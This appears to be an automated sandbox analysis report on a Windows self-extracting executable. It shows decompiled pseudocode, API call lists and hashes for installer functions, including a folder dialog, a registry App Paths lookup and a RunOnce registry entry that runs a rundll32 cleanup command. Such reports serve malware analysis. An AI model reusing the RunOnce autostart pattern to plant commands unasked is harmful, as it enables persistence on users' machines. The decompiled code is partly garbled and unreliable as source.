                                                                                                                                                                                                                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 6120de889ee2c29268d144f6bf30ef9d0f1bd98fdf390b73a52f7b455ca06361
                                                                                                                                                                                                                                                • Instruction ID: b110569cd9a26a6c193dfe158a8a8e57c4acd7f306eb18d91105fbbc51d5977a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6120de889ee2c29268d144f6bf30ef9d0f1bd98fdf390b73a52f7b455ca06361
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E31A731244701BBE7601F35EC4DE6B3AA8E786B87F508629FF02A52A1DB798904CF55
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                                			E00054224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E000544B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x588c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x587a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x58598;
					_v36 = 1;
					_v32 = E00054200;
					_v28 = 0x588c0;
					 *0x5a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x5a288(_t32, 0x588c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x588c0 != 0) {
							E00051680(0x587a0, 0x104, 0x588c0);
						}
						 *0x5a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x587a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x588c0);
					_t61 = 0x588c0;
					_t4 =  &(_t61[1]); // 0x588c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x588c0; // 0xb1181
					_t44 = CharPrevA(0x588c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x588c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                                0x00054234
                                                                                                                                                                                                                                                0x0005423c
                                                                                                                                                                                                                                                0x00054240
                                                                                                                                                                                                                                                0x000543b2
                                                                                                                                                                                                                                                0x000543b7
                                                                                                                                                                                                                                                0x000543c0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000543c5
                                                                                                                                                                                                                                                0x0005424c
                                                                                                                                                                                                                                                0x00054252
                                                                                                                                                                                                                                                0x00054257
                                                                                                                                                                                                                                                0x000543a4
                                                                                                                                                                                                                                                0x000543a5
                                                                                                                                                                                                                                                0x000543ab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000543ab
                                                                                                                                                                                                                                                0x00054263
                                                                                                                                                                                                                                                0x00054269
                                                                                                                                                                                                                                                0x0005426e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005427a
                                                                                                                                                                                                                                                0x00054280
                                                                                                                                                                                                                                                0x00054285
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005428d
                                                                                                                                                                                                                                                0x00054293
                                                                                                                                                                                                                                                0x000542e6
                                                                                                                                                                                                                                                0x000542e9
                                                                                                                                                                                                                                                0x000542ef
                                                                                                                                                                                                                                                0x000542f4
                                                                                                                                                                                                                                                0x000542f7
                                                                                                                                                                                                                                                0x00054300
                                                                                                                                                                                                                                                0x00054307
                                                                                                                                                                                                                                                0x0005430e
                                                                                                                                                                                                                                                0x00054315
                                                                                                                                                                                                                                                0x0005431c
                                                                                                                                                                                                                                                0x00054322
                                                                                                                                                                                                                                                0x00054326
                                                                                                                                                                                                                                                0x0005432d
                                                                                                                                                                                                                                                0x0005432d
                                                                                                                                                                                                                                                0x0005432f
                                                                                                                                                                                                                                                0x00054334
                                                                                                                                                                                                                                                0x00054343
                                                                                                                                                                                                                                                0x00054349
                                                                                                                                                                                                                                                0x0005434d
                                                                                                                                                                                                                                                0x00054354
                                                                                                                                                                                                                                                0x00054354
                                                                                                                                                                                                                                                0x0005435d
                                                                                                                                                                                                                                                0x0005436e
                                                                                                                                                                                                                                                0x0005436e
                                                                                                                                                                                                                                                0x0005437d
                                                                                                                                                                                                                                                0x00054383
                                                                                                                                                                                                                                                0x00054387
                                                                                                                                                                                                                                                0x0005438e
                                                                                                                                                                                                                                                0x0005438e
                                                                                                                                                                                                                                                0x00054387
                                                                                                                                                                                                                                                0x00054391
                                                                                                                                                                                                                                                0x00054399
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054295
                                                                                                                                                                                                                                                0x0005429f
                                                                                                                                                                                                                                                0x000542a5
                                                                                                                                                                                                                                                0x000542aa
                                                                                                                                                                                                                                                0x000542aa
                                                                                                                                                                                                                                                0x000542ad
                                                                                                                                                                                                                                                0x000542ad
                                                                                                                                                                                                                                                0x000542af
                                                                                                                                                                                                                                                0x000542b0
                                                                                                                                                                                                                                                0x000542b6
                                                                                                                                                                                                                                                0x000542c2
                                                                                                                                                                                                                                                0x000542c8
                                                                                                                                                                                                                                                0x000542ce
                                                                                                                                                                                                                                                0x000542e4
                                                                                                                                                                                                                                                0x000542e4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000542ce

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00054236
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0005424C
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00054263
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0005427A
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,000588C0,?,00000001), ref: 0005429F
                                                                                                                                                                                                                                                • CharPrevA.USER32(000588C0,000B1181,?,00000001), ref: 000542C2
                                                                                                                                                                                                                                                • CharPrevA.USER32(000588C0,00000000,?,00000001), ref: 000542D6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00054391
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 000543A5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                • Opcode ID: c281369904707f079c35e37575097dd08c59aac775090b9f770fdca6077c5641
                                                                                                                                                                                                                                                • Instruction ID: fc951d54914352d3b3e59ad84aabca189bcabc9d8110aa3ec82c880080657619
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c281369904707f079c35e37575097dd08c59aac775090b9f770fdca6077c5641
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B411574A00304AFE7109F64DC84ABF7FA4EB0534BF448169ED41AB291CF788D49CB61
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00052773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x58004; // 0x5a679bd9
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00051781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0005658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0005658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x51140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00051680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00056CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                                0x00052773
                                                                                                                                                                                                                                                0x0005277e
                                                                                                                                                                                                                                                0x00052785
                                                                                                                                                                                                                                                0x0005278a
                                                                                                                                                                                                                                                0x0005278d
                                                                                                                                                                                                                                                0x00052790
                                                                                                                                                                                                                                                0x00052792
                                                                                                                                                                                                                                                0x00052798
                                                                                                                                                                                                                                                0x0005279d
                                                                                                                                                                                                                                                0x000528b2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000527a3
                                                                                                                                                                                                                                                0x000527a3
                                                                                                                                                                                                                                                0x000527af
                                                                                                                                                                                                                                                0x000527c2
                                                                                                                                                                                                                                                0x000527c8
                                                                                                                                                                                                                                                0x000527cd
                                                                                                                                                                                                                                                0x000527d5
                                                                                                                                                                                                                                                0x000528b7
                                                                                                                                                                                                                                                0x000528b9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000527db
                                                                                                                                                                                                                                                0x000527dd
                                                                                                                                                                                                                                                0x000528aa
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000527e3
                                                                                                                                                                                                                                                0x000527e3
                                                                                                                                                                                                                                                0x000527ec
                                                                                                                                                                                                                                                0x000527f8
                                                                                                                                                                                                                                                0x00052803
                                                                                                                                                                                                                                                0x0005280b
                                                                                                                                                                                                                                                0x00052831
                                                                                                                                                                                                                                                0x000528c3
                                                                                                                                                                                                                                                0x000528c9
                                                                                                                                                                                                                                                0x000528cd
                                                                                                                                                                                                                                                0x00052837
                                                                                                                                                                                                                                                0x0005285a
                                                                                                                                                                                                                                                0x0005285c
                                                                                                                                                                                                                                                0x00052865
                                                                                                                                                                                                                                                0x00052892
                                                                                                                                                                                                                                                0x00052895
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052867
                                                                                                                                                                                                                                                0x00052878
                                                                                                                                                                                                                                                0x0005288c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005287a
                                                                                                                                                                                                                                                0x00052880
                                                                                                                                                                                                                                                0x00052885
                                                                                                                                                                                                                                                0x00052897
                                                                                                                                                                                                                                                0x00052899
                                                                                                                                                                                                                                                0x00052899
                                                                                                                                                                                                                                                0x00052878
                                                                                                                                                                                                                                                0x00052865
                                                                                                                                                                                                                                                0x000528a0
                                                                                                                                                                                                                                                0x000528bf
                                                                                                                                                                                                                                                0x000528c1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000528c1
                                                                                                                                                                                                                                                0x00052831
                                                                                                                                                                                                                                                0x000527dd
                                                                                                                                                                                                                                                0x000527d5
                                                                                                                                                                                                                                                0x000528e5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharUpperA.USER32(5A679BD9,00000000,00000000,00000000), ref: 000527A8
                                                                                                                                                                                                                                                • CharNextA.USER32(0000054D), ref: 000527B5
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 000527BC
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052829
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052852
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00052870
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000528A0
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 000528AA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 000528B9
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 000527E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                • Opcode ID: 3005c3aba88c938780cc679c25dd8937c8a3f77c29a3902d0b171418ba6ad5df
                                                                                                                                                                                                                                                • Instruction ID: adefbeffc6f193a2853ad98fcdeaa52a992b9ae6c437c37ac8c3649845f9026d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3005c3aba88c938780cc679c25dd8937c8a3f77c29a3902d0b171418ba6ad5df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1841A571A0122CAFEB649B649C45BFB7BBDEF16702F0040A5F945D2141DB744E898FA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 62%
                                                                                                                                                                                                                                                			E00052267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x58004; // 0x5a679bd9
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x58530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0005658A( &_v268, 0x104, 0x51140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0005171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00056CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                                                                0x00052272
                                                                                                                                                                                                                                                0x00052277
                                                                                                                                                                                                                                                0x00052279
                                                                                                                                                                                                                                                0x00052283
                                                                                                                                                                                                                                                0x00052289
                                                                                                                                                                                                                                                0x000522ab
                                                                                                                                                                                                                                                0x000522b1
                                                                                                                                                                                                                                                0x000522c4
                                                                                                                                                                                                                                                0x000522e0
                                                                                                                                                                                                                                                0x000522e6
                                                                                                                                                                                                                                                0x000522f5
                                                                                                                                                                                                                                                0x0005230d
                                                                                                                                                                                                                                                0x0005231c
                                                                                                                                                                                                                                                0x0005231c
                                                                                                                                                                                                                                                0x00052321
                                                                                                                                                                                                                                                0x0005233a
                                                                                                                                                                                                                                                0x00052342
                                                                                                                                                                                                                                                0x00052348
                                                                                                                                                                                                                                                0x0005234b
                                                                                                                                                                                                                                                0x0005234c
                                                                                                                                                                                                                                                0x0005234c
                                                                                                                                                                                                                                                0x0005234e
                                                                                                                                                                                                                                                0x0005234f
                                                                                                                                                                                                                                                0x0005236e
                                                                                                                                                                                                                                                0x0005236e
                                                                                                                                                                                                                                                0x0005237a
                                                                                                                                                                                                                                                0x00052380
                                                                                                                                                                                                                                                0x00052380
                                                                                                                                                                                                                                                0x00052381
                                                                                                                                                                                                                                                0x00052381
                                                                                                                                                                                                                                                0x0005238f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 000522A3
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 000522D8
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 000522F5
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00052305
                                                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0005236E
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0005237A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00052321
                                                                                                                                                                                                                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0005232D
                                                                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00052299
                                                                                                                                                                                                                                                • wextract_cleanup0, xrefs: 0005227C, 000522CD, 00052363
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                                                                • API String ID: 3027380567-2554356261
                                                                                                                                                                                                                                                • Opcode ID: 084f5af49385e6bb59ff836adb2a8795592acc0998d7ffa5a5afc985af507b9b
                                                                                                                                                                                                                                                • Instruction ID: b2216b45ee17a129bab37a407d62225f04053560cf2dfc55d157e704f6074d15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 084f5af49385e6bb59ff836adb2a8795592acc0998d7ffa5a5afc985af507b9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D931B471A00218ABDF619B60DC49FEB7B7CEF15742F0001A9BD0DAA051EA75AB8CCB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                			E00053100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x58590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x58590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E000543D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x58d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x588b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E000530C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                                                                0x00053108
                                                                                                                                                                                                                                                0x0005310b
                                                                                                                                                                                                                                                0x000531b7
                                                                                                                                                                                                                                                0x000531ca
                                                                                                                                                                                                                                                0x000531d0
                                                                                                                                                                                                                                                0x000531d0
                                                                                                                                                                                                                                                0x000531da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000531da
                                                                                                                                                                                                                                                0x00053111
                                                                                                                                                                                                                                                0x00053114
                                                                                                                                                                                                                                                0x00053136
                                                                                                                                                                                                                                                0x00053136
                                                                                                                                                                                                                                                0x00053138
                                                                                                                                                                                                                                                0x0005313b
                                                                                                                                                                                                                                                0x00053141
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053143
                                                                                                                                                                                                                                                0x00053116
                                                                                                                                                                                                                                                0x0005311b
                                                                                                                                                                                                                                                0x0005314b
                                                                                                                                                                                                                                                0x00053151
                                                                                                                                                                                                                                                0x00053158
                                                                                                                                                                                                                                                0x0005316a
                                                                                                                                                                                                                                                0x00053176
                                                                                                                                                                                                                                                0x0005317d
                                                                                                                                                                                                                                                0x0005318b
                                                                                                                                                                                                                                                0x0005319e
                                                                                                                                                                                                                                                0x000531a3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000531ad
                                                                                                                                                                                                                                                0x00053120
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005312a
                                                                                                                                                                                                                                                0x00053134
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053134
                                                                                                                                                                                                                                                0x0005312c
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 0005313B
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0005314B
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000834), ref: 0005316A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 00053176
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0005317D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000834), ref: 00053185
                                                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00053190
                                                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,000530C0), ref: 000531A3
                                                                                                                                                                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 000531CA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 3785188418-2780258678
